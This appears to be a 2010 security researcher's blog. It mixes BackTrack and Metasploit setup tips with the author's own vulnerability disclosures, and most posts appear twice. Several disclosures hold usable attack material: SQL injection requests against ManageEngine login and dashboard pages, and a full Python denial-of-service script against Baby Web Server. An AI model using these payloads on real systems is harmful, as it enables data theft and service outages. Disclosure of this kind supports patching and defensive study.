Problem while Connection Mysql Database
solution
1)msf > db_driver
2)msf > db_driver mysql
3)root@bt:/pentest/exploits/framework3# mysql -u root -p
4)mysql> CREATE USER msf3@localhost IDENTIFIED BY 'test';
5)mysql> CREATE DATABASE msf3;
6)mysql> GRANT ALL PRIVILEGES ON msf3.* TO msf3@localhost;
Another Problem while Installing if you are using sqlite3
then
root@bt:/pentest/exploits/armitage# ./armitage.sh
password is blank i.e
DB Connect String -
Wednesday, December 15, 2010
Armitage Setup
To install Armitage in BackTrack,
1)root@bt:~# apt-get update
2)root@bt:~# apt-get install armitage
3)root@bt:~# msfrpcd -f -U msf -P test -t Basic
4)root@bt:~# /etc/init.d/mysql start
5)root@bt:/pentest/exploits/armitage# ./armitage.sh
In BackTrack, the default MYSQL credentials are root / toor and for PostgreSQL,
if using sqlite3 credential is blank password
6)select the "Use SSL" checkbox, verify the rest of the settings and click "Connect".
1)root@bt:~# apt-get update
2)root@bt:~# apt-get install armitage
3)root@bt:~# msfrpcd -f -U msf -P test -t Basic
4)root@bt:~# /etc/init.d/mysql start
5)root@bt:/pentest/exploits/armitage# ./armitage.sh
In BackTrack, the default MYSQL credentials are root / toor and for PostgreSQL,
if using sqlite3 credential is blank password
6)select the "Use SSL" checkbox, verify the rest of the settings and click "Connect".
Saturday, September 25, 2010
Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
Detail of POC can be viewed
http://www.exploit-db.com/exploits/15061/
http://www.securityfocus.com/bid/43345/info
Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
by
Asheesh Kumar Mani Tripathi
# Vulnerability Discovered By Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
# Date 18th Sep 2010
# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities such as buffer overflow, integer overflow and denial of service (IE crash). This issue is triggered when an attacker convinces a victim user to visit a malicious website.
The "GetLicenseFromURLAsync" function does not handle input correctly.
Remote attackers may exploit this issue to execute arbitrary machine code in the context of the affected application, facilitating the remote compromise of affected computers. Faile exploit attempts likely result in browser crashes.
Detail of POC can be viewed
link:http://www.exploit-db.com/exploits/15061/
link:http://www.securityfocus.com/bid/43345/info
http://www.exploit-db.com/exploits/15061/
http://www.securityfocus.com/bid/43345/info
Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
by
Asheesh Kumar Mani Tripathi
# Vulnerability Discovered By Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
# Date 18th Sep 2010
# Description: Microsoft DRM technology (msnetobj.dll) ActiveX suffers from multiple remote vulnerabilities such as buffer overflow, integer overflow and denial of service (IE crash). This issue is triggered when an attacker convinces a victim user to visit a malicious website.
The "GetLicenseFromURLAsync" function does not handle input correctly.
Remote attackers may exploit this issue to execute arbitrary machine code in the context of the affected application, facilitating the remote compromise of affected computers. Faile exploit attempts likely result in browser crashes.
Detail of POC can be viewed
link:http://www.exploit-db.com/exploits/15061/
link:http://www.securityfocus.com/bid/43345/info
Wednesday, August 18, 2010
Problem :No Internet in Backtrack 4
Problem :No Internet in Backtrack 4 BT4
1)start the Network ..
In command line type
bt# /etc/init.d/networking start
or Menu -> Services -> NETWORK -> Start NETWORK
Then Configure Network Card
Static IP address
ifconfig eth0 192.168.1.2
For variable subnet mask
ifconfig eth0 192.168.1.2 netmask 255.255.255.224
Add a default gateway:
route add default gw 192.168.1.1 eth0
Replace the IP address with your default gateways
Assign DNS servers:
echo nameserver 200.1.1.1 > /etc/resolv.conf
For DHCP
dhcpcd eth0
1)start the Network ..
In command line type
bt# /etc/init.d/networking start
or Menu -> Services -> NETWORK -> Start NETWORK
Then Configure Network Card
Static IP address
ifconfig eth0 192.168.1.2
For variable subnet mask
ifconfig eth0 192.168.1.2 netmask 255.255.255.224
Add a default gateway:
route add default gw 192.168.1.1 eth0
Replace the IP address with your default gateways
Assign DNS servers:
echo nameserver 200.1.1.1 > /etc/resolv.conf
For DHCP
dhcpcd eth0
Metasploit db_create error
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
Solution
Just use
msf > db_driver sqlite3
or
msf > db_connect
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
Solution
Just use
msf > db_driver sqlite3
or
msf > db_connect
Sunday, June 13, 2010
Installing Oracle Client using TOAD
1)Install the oracle instant client. (instantclient_10_2)
Unzip the files to a directory, and then copy the path of this directory to the clipboard.
2)Add this directory to the PATH environmental variable.
right click on My Computer, go to the Advanced tab, and click 'Environment Variables'. Under System variables, find 'Path'. Select it, and click edit. ctrl-v to paste the directory into the string, and say OK. e.g.:
Before:C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\
After: C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\;C:\instantclient_10_2
3)In the same window, under 'User variables for ...', Click the New button. Call the variable 'TNS_ADMIN'. ctrl-v to paste the directory path into the 'variable value' field. Say OK, and close out the 'My Computer' properties windows.
e.g Varaible name TNS_ADMIN
variable value C:\instantclient_10_2
4)Create a file called 'TNSNAMES.ORA' in your instant client installation directory. In this file designate the connection parameters for your database. Mine looked something like this:
DB_ALIAS =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = ip.add.re.ss)(PORT = 1521))
)
(CONNECT_DATA =
(SID = orcl)
(SERVER = DEDICATED)
)
)
replace the DB_ALIAS, ip.add.re.ss, port, and SID with your settings.
5)Reset your computer, fire up Toad, and then open a new connection. You should see DB_ALIAS as an option under the database field. Set your username and password, hit connect
Unzip the files to a directory, and then copy the path of this directory to the clipboard.
2)Add this directory to the PATH environmental variable.
right click on My Computer, go to the Advanced tab, and click 'Environment Variables'. Under System variables, find 'Path'. Select it, and click edit. ctrl-v to paste the directory into the string, and say OK. e.g.:
Before:C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\
After: C:\Perl\bin\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\10.0\DLLShared\;C:\instantclient_10_2
3)In the same window, under 'User variables for ...', Click the New button. Call the variable 'TNS_ADMIN'. ctrl-v to paste the directory path into the 'variable value' field. Say OK, and close out the 'My Computer' properties windows.
e.g Varaible name TNS_ADMIN
variable value C:\instantclient_10_2
4)Create a file called 'TNSNAMES.ORA' in your instant client installation directory. In this file designate the connection parameters for your database. Mine looked something like this:
DB_ALIAS =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = ip.add.re.ss)(PORT = 1521))
)
(CONNECT_DATA =
(SID = orcl)
(SERVER = DEDICATED)
)
)
replace the DB_ALIAS, ip.add.re.ss, port, and SID with your settings.
5)Reset your computer, fire up Toad, and then open a new connection. You should see DB_ALIAS as an option under the database field. Set your username and password, hit connect
Friday, March 5, 2010
File association fixes for Windows Vista
his page contains the file association fixes for some of the most common file types. The fixes are applicable for Windows® Vista systems only.
http://www.winhelponline.com/articles/105/1/File-association-fixes-for-Windows-Vista.html
Broken EXE Association
Executable (.EXE) files are the programs you run for most tasks on a computer. Now and again someone reports that they have, in error, assigned some other program to the .EXE extension without first establishing a System Restore Point so they can recover from making this error. When that happens little will run on the computer. Instead, when an .EXE file is clicked some program will start and attempt to process that file instead.
http://filext.com/faq/broken_exe_association.php
http://www.winhelponline.com/articles/105/1/File-association-fixes-for-Windows-Vista.html
Broken EXE Association
Executable (.EXE) files are the programs you run for most tasks on a computer. Now and again someone reports that they have, in error, assigned some other program to the .EXE extension without first establishing a System Restore Point so they can recover from making this error. When that happens little will run on the computer. Instead, when an .EXE file is clicked some program will start and attempt to process that file instead.
http://filext.com/faq/broken_exe_association.php
Wednesday, March 3, 2010
Opera (plenitude String )Denial of Service Exploit
http://www.packetstormsecurity.org/1003-exploits/operaplen-crash.txt
http://www.exploit-db.com/exploits/11617
=======================================================================
Opera (plenitude String )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
#Download http://www.opera.com/download/
#Background
Opera is a popular internet browser :)
#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
Why do you worry without cause? Whom do you fear without reason? Who can kill you?
The soul is neither born, nor does it die.
#If you have any questions, comments, or concerns, feel free to contact me.
http://www.exploit-db.com/exploits/11617
=======================================================================
Opera (plenitude String )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
#Download http://www.opera.com/download/
#Background
Opera is a popular internet browser :)
#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
Why do you worry without cause? Whom do you fear without reason? Who can kill you?
The soul is neither born, nor does it die.
#If you have any questions, comments, or concerns, feel free to contact me.
Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
link:http://www.exploit-db.com/exploits/11617
link:http://www.packetstormsecurity.org/1003-exploits/mozff36-crash.txt
for code
=======================================================================
Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
#Download www.mozilla.com/firefox
#Background
Mozilla Firefox is a popular internet browser. .....:)
#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
MOzilla Crash :)
#Proof of concept
copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data
open in Mozilla Firefox and wait for 15 sec ...... :) and say Good Bye
Mozilla .......
Per usske phele Mozilla k antim darshan kar le :) Prem se bolo jai maata di
Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!
BHAGAVAD GITA Quote
You came empty handed, you will leave empty handed. What is yours today, belonged to someone else yesterday, and will belong to someone else the day after tomorrow. So, whatever you do, do it as a dedication to God!
Tum khaali haath aaye, khaali haath chale. Jo aaj tumhara hain, wao kal kisi aur ka tha, parso kisi aur ka hoga. Tum isse apna samajhkar magna ho rahe ho,bus yahi prasannatha tumhare dukhon ka kaaran hain.
#If you have any questions, comments, or concerns, feel free to contact me.
link:http://www.packetstormsecurity.org/1003-exploits/mozff36-crash.txt
for code
=======================================================================
Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company www.aksitservices.co.in
# Credit by Asheesh Anaconda
#Download www.mozilla.com/firefox
#Background
Mozilla Firefox is a popular internet browser. .....:)
#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
MOzilla Crash :)
#Proof of concept
copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data
open in Mozilla Firefox and wait for 15 sec ...... :) and say Good Bye
Mozilla .......
Per usske phele Mozilla k antim darshan kar le :) Prem se bolo jai maata di
Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!
BHAGAVAD GITA Quote
You came empty handed, you will leave empty handed. What is yours today, belonged to someone else yesterday, and will belong to someone else the day after tomorrow. So, whatever you do, do it as a dedication to God!
Tum khaali haath aaye, khaali haath chale. Jo aaj tumhara hain, wao kal kisi aur ka tha, parso kisi aur ka hoga. Tum isse apna samajhkar magna ho rahe ho,bus yahi prasannatha tumhare dukhon ka kaaran hain.
#If you have any questions, comments, or concerns, feel free to contact me.
Thursday, February 18, 2010
Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
http://www.exploit-db.com/exploits/11438
http://seclists.org/fulldisclosure/2010/Feb/281
for code visit above link as no script allow in blogger
=======================================================================
Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company aksitservices
# Credit by Asheesh Anaconda
#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)
#Background
Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)
#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists within "history go" ActiveX control which contains
stack based overflow conditions.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
your system unaccessible,your work if any might be lost
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Internet Explorer 8
========================================================================================================================
asheesh.html
========================================================================================================================
asheesh kumar mani tripathi
========================================================================================================================
#If you have any questions, comments, or concerns, feel free to contact me.
http://www.exploit-db.com/exploits/11438
http://seclists.org/fulldisclosure/2010/Feb/281
for code visit above link as no script allow in blogger
=======================================================================
Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company aksitservices
# Credit by Asheesh Anaconda
#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)
#Background
Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)
#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists within "history go" ActiveX control which contains
stack based overflow conditions.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
your system unaccessible,your work if any might be lost
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Internet Explorer 8
========================================================================================================================
asheesh.html
========================================================================================================================
========================================================================================================================
#If you have any questions, comments, or concerns, feel free to contact me.
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
http://www.exploit-db.com/exploits/11432
http://seclists.org/fulldisclosure/2010/Feb/280
=======================================================================
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company aksitservices
# Credit by Asheesh Anaconda
#Download www.mozilla.com/firefox
#Background
Mozilla Firefox is a popular internet browser. .....:)
#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
========================================================================================================================
asheesh.html
========================================================================================================================
asheesh kumar mani tripathi
========================================================================================================================
#If you have any questions, comments, or concerns, feel free to contact me.
http://www.exploit-db.com/exploits/11432
http://seclists.org/fulldisclosure/2010/Feb/280
=======================================================================
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================
by
Asheesh Kumar Mani Tripathi
# code by Asheesh kumar Mani Tripathi
# email informationhacker08@gmail.com
# company aksitservices
# Credit by Asheesh Anaconda
#Download www.mozilla.com/firefox
#Background
Mozilla Firefox is a popular internet browser. .....:)
#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
========================================================================================================================
asheesh.html
========================================================================================================================
========================================================================================================================
#If you have any questions, comments, or concerns, feel free to contact me.
ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability
ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/38082/info
www.packetstormsecurity.org/1002-exploits/oputils_5-sql.txt
================================================================================
ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
================================================================================
#Date-3/2/10
# code by Asheesh kumar Mani Tripathi
# AKS IT Services
# Credit by Asheesh Anaconda
#Download http://www.manageengine.com/products/oputils
#Vulnerbility
ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database
========================================================================================================================
Request
========================================================================================================================
POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:24:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583
http://www.securityfocus.com/bid/38082/info
www.packetstormsecurity.org/1002-exploits/oputils_5-sql.txt
================================================================================
ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
================================================================================
#Date-3/2/10
# code by Asheesh kumar Mani Tripathi
# AKS IT Services
# Credit by Asheesh Anaconda
#Download http://www.manageengine.com/products/oputils
#Vulnerbility
ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database
========================================================================================================================
Request
========================================================================================================================
POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:24:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583
Sunday, January 24, 2010
FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.
A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html
find Details
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
FileCOPA FTP Server is prone to a denial-of-service vulnerability.
A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html
find Details
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.
A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html
find Details
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
FileCOPA FTP Server is prone to a denial-of-service vulnerability.
A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html
find Details
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
Blind SQL/XPath injection in OPMANAGER
Blind SQL/XPath injection in OPMANAGER
packetstormsecurity.org/0912-exploits/opmanager-sql.txt
http://www.exploit-db.com/exploits/10372
ManageEngine OpManager 'overview.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/37289
Exploit Code
*******************************Blind SQL/XPath injection in OPMANAGER***********************************
# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]
Description
SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.
Vulnerable:
http://overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[Sql injectio ]&isFromInfra=yes HTTP/1.0
Get
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+313
37-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache
Request:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8
packetstormsecurity.org/0912-exploits/opmanager-sql.txt
http://www.exploit-db.com/exploits/10372
ManageEngine OpManager 'overview.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/37289
Exploit Code
*******************************Blind SQL/XPath injection in OPMANAGER***********************************
# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]
Description
SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.
Vulnerable:
http://
Get
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+313
37-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache
Request:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8
Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability
Pablo Software Solutions Baby Web Server is prone to a remote denial-of-service vulnerability. An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
http://exploits.offensive-security.com/record.php?id=10171&type=dos
packetstormsecurity.org/0911-exploits/babywebserver.py.txt
http://www.securityfocus.com/bid/36942
Exploit Code
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "*****************************************************"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (1,1100):
request = "GET /some.txt HTTP/1.1 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Oh! Some Problem Occured Check Server is Running or Not"
http://exploits.offensive-security.com/record.php?id=10171&type=dos
packetstormsecurity.org/0911-exploits/babywebserver.py.txt
http://www.securityfocus.com/bid/36942
Exploit Code
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket
print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "*****************************************************"
host = "127.0.0.1"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (1,1100):
request = "GET /some.txt HTTP/1.1 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Oh! Some Problem Occured Check Server is Running or Not"
SIDVault Remote Denial of Service
#links-http://downloads.securityfocus.com/vulnerabilities/exploits/36394.py
#http://www.packetstormsecurity.org/0909-exploits/sidvault20evista-crash.txt
#http://inj3ct0r.com/%5Bremote%5D/1292
#SIDVault is prone to a remote denial-of-service vulnerability.
#Successful exploits allow remote attackers to cause the affected server to stop #responding, denying service to legitimate users.
#SIDVault 2.0e for Windows is vulnerable; other versions may also be affected.
